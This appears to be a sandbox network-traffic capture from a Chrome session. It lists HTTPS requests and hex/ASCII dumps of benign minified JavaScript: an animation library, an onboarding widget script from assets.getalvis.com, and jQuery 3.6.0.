                                                                                                                                                                                                        Data Ascii: timer&&this.timer.destroy(),this.queue=[],this.active=!1),ge=="number"&&ve)return this.timer=new te({duration:le,context:this,complete:Z}),void(this.active=!0);if(ge=="string"&&ve){switch(le){case"hide":ne.call(this);break;case"stop":ae.call(this);break;c
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 5b 6c 65 5d 3d 31 29 3a 76 65 3d 74 79 70 65 6f 66 20 6c 65 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6c 65 21 3d 6e 75 6c 6c 3f 6c 65 3a 74 68 69 73 2e 70 72 6f 70 73 2c 50 74 2e 63 61 6c 6c 28 74 68 69 73 2c 76 65 2c 6a 65 29 2c 5f 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 6c 65 29 7b 61 65 2e 63 61 6c 6c 28 74 68 69 73 2c 6c 65 29 2c 50 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6c 65 2c 4d 6e 2c 6f 77 29 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 6c 65 29 7b 74 79 70 65 6f 66 20 6c 65 21 3d 22 73 74 72 69 6e 67 22 26 26 28 6c 65 3d 22 62 6c 6f 63 6b 22 29 2c 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 6c 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 29 7b 61 65 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 68 69 73 2e 65 6c
                                                                                                                                                                                                        Data Ascii: [le]=1):ve=typeof le=="object"&&le!=null?le:this.props,Pt.call(this,ve,je),_e.call(this)}function se(le){ae.call(this,le),Pt.call(this,le,Mn,ow)}function de(le){typeof le!="string"&&(le="block"),this.el.style.display=le}function ne(){ae.call(this),this.el
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 3d 22 22 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 21 31 2c 69 65 2e 6b 65 65 70 49 6e 68 65 72 69 74 65 64 26 26 21 69 65 2e 66 61 6c 6c 62 61 63 6b 29 7b 76 61 72 20 76 65 3d 65 65 28 74 68 69 73 2e 65 6c 2c 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 3b 76 65 26 26 21 4c 2e 74 65 73 74 28 76 65 29 26 26 28 74 68 69 73 2e 75 70 73 74 72 65 61 6d 3d 76 65 29 7d 4b 2e 62 61 63 6b 66 61 63 65 26 26 69 65 2e 68 69 64 65 42 61 63 6b 66 61 63 65 26 26 42 28 74 68 69 73 2e 65 6c 2c 4b 2e 62 61 63 6b 66 61 63 65 2e 63 73 73 2c 22 68 69 64 64 65 6e 22 29 7d 2c 66 74 28 22 61 64 64 22 2c 6a 29 2c 66 74 28 22 73 74 61 72 74 22 2c 57 29 2c 66 74 28 22 77 61 69 74 22 2c 59 29 2c 66 74 28 22 74 68 65 6e 22 2c 55 29 2c 66 74 28 22 6e 65 78 74 22 2c 5a 29 2c 66 74 28 22 73 74
                                                                                                                                                                                                        Data Ascii: ="",this.active=!1,ie.keepInherited&&!ie.fallback){var ve=ee(this.el,"transition");ve&&!L.test(ve)&&(this.upstream=ve)}K.backface&&ie.hideBackface&&B(this.el,K.backface.css,"hidden")},ft("add",j),ft("start",W),ft("wait",Y),ft("then",U),ft("next",Z),ft("st
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2c 74 68 69 73 2e 61 6e 67 6c 65 3d 64 65 2e 61 6e 67 6c 65 7c 7c 74 68 69 73 2e 61 6e 67 6c 65 7c 7c 69 65 2e 64 65 66 61 75 6c 74 41 6e 67 6c 65 2c 69 65 2e 66 61 6c 6c 62 61 63 6b 7c 7c 64 65 2e 66 61 6c 6c 62 61 63 6b 3f 74 68 69 73 2e 61 6e 69 6d 61 74 65 3d 74 68 69 73 2e 66 61 6c 6c 62 61 63 6b 3a 28 74 68 69 73 2e 61 6e 69 6d 61 74 65 3d 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 2c 74 68 69 73 2e 73 74 72 69 6e 67 3d 74 68 69 73 2e 6e 61 6d 65 2b 41 2b 74 68 69 73 2e 64 75 72 61 74 69 6f 6e 2b 22 6d 73 22 2b 28 74 68 69 73 2e 65 61 73 65 21 3d 22 65 61 73 65 22 3f 41 2b 76 5b 74 68 69 73 2e 65 61 73 65 5d 5b 30 5d 3a 22 22 29 2b 28 74 68 69 73 2e 64 65 6c 61 79 3f 41 2b 74 68 69 73 2e 64 65 6c 61 79 2b 22 6d 73 22 3a 22 22 29 29 7d 2c 4d 2e 73
                                                                                                                                                                                                        Data Ascii: ,this.angle=de.angle||this.angle||ie.defaultAngle,ie.fallback||de.fallback?this.animate=this.fallback:(this.animate=this.transition,this.string=this.name+A+this.duration+"ms"+(this.ease!="ease"?A+v[this.ease][0]:"")+(this.delay?A+this.delay+"ms":""))},M.s


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        99192.168.2.549887104.21.84.574436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC365OUTGET /alvis-onboard-1.0.8.js HTTP/1.1
                                                                                                                                                                                                        Host: assets.getalvis.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 20666
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Thu, 27 Jan 2022 21:53:01 GMT
                                                                                                                                                                                                        etag: "1200a42843993dec74b309e4b1a1cbab"
                                                                                                                                                                                                        x-cache: Hit from cloudfront
                                                                                                                                                                                                        via: 1.1 b9fa5c33e059fb3ed603bd8fcb9d4aea.cloudfront.net (CloudFront)
                                                                                                                                                                                                        x-amz-cf-pop: JFK50-P1
                                                                                                                                                                                                        x-amz-cf-id: SO74K0zrMburItZ7WIBy99bOjJdRt3O6Tn3W845wpAvk8CKJf-jkAw==
                                                                                                                                                                                                        Age: 3
                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOd0FHHRdI8ZeiRug5q7AdeL3AzrCg2icYncDCm%2BcppWQ1u1LqtTrHYVGMQCF2ajdH6HLFhFFxcLAeTMaQKI4olLmQTEsKB59%2FGZL8kkT6AJMZWbGq0X%2F4bWA%2FqQTlevCAyC%2FZFQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c9ef7e0f9b-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC456INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 6e 5b 69 5d 29 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 63 3d 6e 5b 69 5d 3d 7b 69 3a 69 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 69 5d 2e 63 61 6c 6c 28 63 2e 65 78 70 6f 72 74 73 2c 63 2c 63 2e 65 78 70 6f 72 74 73 2c 74 29 2c 63 2e 6c 3d 21 30 2c 63 2e 65 78 70 6f 72 74 73 7d 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 7d 29 7d 2c 74 2e 72 3d 66 75 6e
                                                                                                                                                                                                        Data Ascii: !function(e){var n={};function t(i){if(n[i])return n[i].exports;var c=n[i]={i:i,l:!1,exports:{}};return e[i].call(c.exports,c,c.exports,t),c.l=!0,c.exports}t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:i})},t.r=fun
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 29 2c 38 26 6e 29 72 65 74 75 72 6e 20 65 3b 69 66 28 34 26 6e 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 69 66 28 74 2e 72 28 69 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 65 7d 29 2c 32 26 6e 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 29 66 6f 72 28 76 61 72 20 63 20 69 6e 20 65 29 74 2e 64 28 69 2c 63 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 7d 2e 62 69 6e 64 28 6e 75 6c 6c 2c 63 29 29 3b 72 65 74 75 72 6e
                                                                                                                                                                                                        Data Ascii: ),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var c in e)t.d(i,c,function(n){return e[n]}.bind(null,c));return
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 28 65 2c 6e 2c 74 2c 63 2c 6f 29 7d 29 2c 32 65 34 2a 6f 29 3a 76 6f 69 64 20 30 21 3d 3d 74 26 26 74 26 26 74 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 29 7d 2c 72 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 3d 21 30 2c 72 2e 6f 70 65 6e 28 63 2c 65 2c 21 30 29 2c 72 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 3d 21 31 2c 22 50 4f 53 54 22 3d 3d 3d 63 26 26 61 26 26 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 2c 72 2e 73 65 6e 64 28 61 29 2c 6f 2b 2b 7d 2c 63 3d 69 2c 6f 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                        Data Ascii: out((function(){i(e,n,t,c,o)}),2e4*o):void 0!==t&&t&&t(this.responseText)))},r.crossDomain=!0,r.open(c,e,!0),r.withCredentials=!1,"POST"===c&&a&&r.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),r.send(a),o++},c=i,o="undefined"==typeo
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 69 73 73 22 7d 28 70 7c 7c 28 70 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 76 61 72 20 6e 3d 65 5b 30 5d 2c 74 3d 65 5b 31 5d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 29 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 22 72 65 61 64 79 22 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 2e 52 45 41 44 59 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 69 73 6d 69 73 73 22 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 2e 44 49 53 4d 49 53 53 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 76 61 72 20 6e 3d 65 5b 30 5d 2c
                                                                                                                                                                                                        Data Ascii: iss"}(p||(p={}));function m(e){void 0===e&&(e=[]);var n=e[0],t=e[1];if("function"==typeof t)switch(n){case"ready":document.addEventListener(p.READY,t);break;case"dismiss":document.addEventListener(p.DISMISS,t)}}function _(e){void 0===e&&(e=[]);var n=e[0],
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 69 64 65 6e 74 69 66 79 28 6e 5b 30 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 70 61 67 65 22 3a 61 2e 70 61 67 65 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 70 64 61 74 65 22 3a 61 2e 75 70 64 61 74 65 28 6e 5b 30 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 74 72 61 63 6b 22 3a 61 2e 74 72 61 63 6b 28 6e 29 7d 7d 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 2c 6e 3d 30 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 6e 2b 2b 29 65 2b 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 2e 6c 65 6e 67 74 68 3b 76 61 72 20 69 3d 41 72 72 61 79 28 65 29 2c 63 3d 30 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 2c 61 3d 30 2c 72 3d 6f 2e
                                                                                                                                                                                                        Data Ascii: identify(n[0]);break;case"page":a.page();break;case"update":a.update(n[0]);break;case"track":a.track(n)}};var f=function(){for(var e=0,n=0,t=arguments.length;n<t;n++)e+=arguments[n].length;var i=Array(e),c=0;for(n=0;n<t;n++)for(var o=arguments[n],a=0,r=o.
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 39 30 70 78 3b 5c 6e 20 20 20 20 72 69 67 68 74 3a 20 31 30 30 70 78 3b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 34 30 30 70 78 3b 5c 6e 20 20 20 20 68 65 69 67 68 74 3a 20 34 36 30 70 78 3b 5c 6e 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 35 29 20 30 70 78 20 35 70 78 20 33 30 70 78 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 5c 6e 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 5c 6e 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 5c 6e 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 39 35 70 78 29 3b 5c 6e 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 6f 74 74 6f 6d 20 30 2e 32 35 73 20 65 61 73 65 20 30 73 2c 20
                                                                                                                                                                                                        Data Ascii: 90px;\n right: 100px;\n width: 400px;\n height: 460px;\n box-shadow: rgba(0, 0, 0, 0.15) 0px 5px 30px;\n border-radius: 8px;\n overflow: hidden;\n opacity: 1;\n max-height: calc(100% - 95px);\n transition: bottom 0.25s ease 0s,
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 5c 6e 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 30 30 31 3b 5c 6e 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 32 30 70 78 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 3b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 64 6c 2d 6f 70 65 6e 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6d 64 6c 2d 69 6e 6e 65 72 20 69 66 72 61 6d 65 7b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 2d 72 61
                                                                                                                                                                                                        Data Ascii: position: relative;\n z-index: 2147483001;\n max-width: 720px;\n padding: 40px;\n margin: 0 auto;\n }\n\n #alvis-nbcl-container.alvis-nbcl-container--mdl-open #alvis-nbcl-mdl-inner iframe{\n width: 100%;\n height: 100%;\n border-ra
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6e 65 3b 5c 6e 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 31 70 78 2c 20 31 70 78 29 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6c 61 75 6e 63 68 65 72 20 2e 61 6c 76 69 73 2d 6e 62 63 6c 2d 74 69 74 6c 65 20 7b 5c 6e 20 20 20 20 63 6f 6c 6f 72 3a 20 7b 7b 69 6e 76 5f 74 68 65 6d 65 5f 63 6f 6c 6f 72 7d 7d 3b 5c 6e 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6c 61 75 6e 63 68 65 72 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 75 6e 74 20 7b 5c
                                                                                                                                                                                                        Data Ascii: ne;\n transform: translate(1px, 1px);\n }\n\n #alvis-nbcl-launcher .alvis-nbcl-title {\n color: {{inv_theme_color}};\n display: flex;\n justify-content: space-between;\n font-size: 16px;\n }\n\n #alvis-nbcl-launcher #alvis-nbcl-count {\
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 69 6e 67 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 68 69 64 69 6e 67 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6f 70 65 6e 22 29 7d 29 2c 33 30 30 29 7d 7d 76 61 72 20 78 3d 2f 5c 7b 5c 7b 5b 61 2d 7a 41 2d 5a 5c 2e 5c 5f 5c 2d 5c 64 5d 2b
                                                                                                                                                                                                        Data Ascii: meout((function(){n.classList.remove("alvis-nbcl-container--opening"),n.classList.remove("alvis-nbcl-container--hiding"),n.classList.contains("alvis-nbcl-container--open")||n.classList.add("alvis-nbcl-container--open")}),300)}}var x=/\{\{[a-zA-Z\.\_\-\d]+
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 6f 72 28 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 3b 74 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3e 30 3b 29 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 29 7d 2c 61 2e 67 65 74 46 72 6f 6d 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 29 72 65 74 75 72 6e 20 65 3d 65 2b 22 5f 22 2b 72 2e 61 6c 76 69 73 5f 69 64 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 2c 61 2e 67 65 74 54 6f 70 44 6f 6d 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 66 6f 72 28 76 61 72 20 65
                                                                                                                                                                                                        Data Ascii: ocument.createElement("div");for(t.innerHTML=n;t.children.length>0;)e.appendChild(t.children[0])},a.getFromStorage=function(e){try{if(window.localStorage)return e=e+"_"+r.alvis_id,localStorage.getItem(e)}catch(e){}},a.getTopDomain=function(){try{for(var e


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        100192.168.2.549888151.101.66.1374436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                        Host: code.jquery.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 89501
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 3050141
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890062-NYC
                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                        X-Cache-Hits: 55, 0
                                                                                                                                                                                                        X-Timer: S1725034585.646062,VS0,VE1
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
